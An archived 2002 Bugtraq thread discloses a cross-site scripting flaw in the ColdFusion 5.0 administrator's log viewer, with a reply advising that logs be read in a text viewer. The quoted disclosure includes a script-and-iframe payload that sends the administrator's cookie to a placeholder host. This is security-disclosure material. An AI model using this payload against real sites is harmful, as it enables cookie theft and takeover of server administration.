[28215] in bugtraq
Re: Cross-site scripting vulnerability in CF 5.0
daemon@ATHENA.MIT.EDU (SecurityFocus@cubesearch.com)
Mon Dec 16 15:08:38 2002
Date: Mon, 16 Dec 2002 11:24:15 -0800 (PST)
From: <SecurityFocus@cubesearch.com>
To: KiLL CoLe <killcole@yahoo.com>
In-Reply-To: <20021216181615.63458.qmail@web12407.mail.yahoo.com>
Message-ID: <Pine.LNX.4.33L2.0212161120550.19653-100000@butch.cubesearch.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Something to note:
The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.
So, It's generally a better (and safer, with this cross-site scripting
problem that's been around for years) to view the logs file via a text
viewer on the sytem.
By default, it's c:\cfusion\log\*.log
On Mon, 16 Dec 2002, KiLL CoLe wrote:
> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. the coldfusion
> administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter coldfusions application
> log. take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> if the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code:
> if url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
> + document.cookie</script>
>
> this would enable an attacker to steal the value of
> the coldfusion administrators cookie. Decrypting the
> coldfusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>
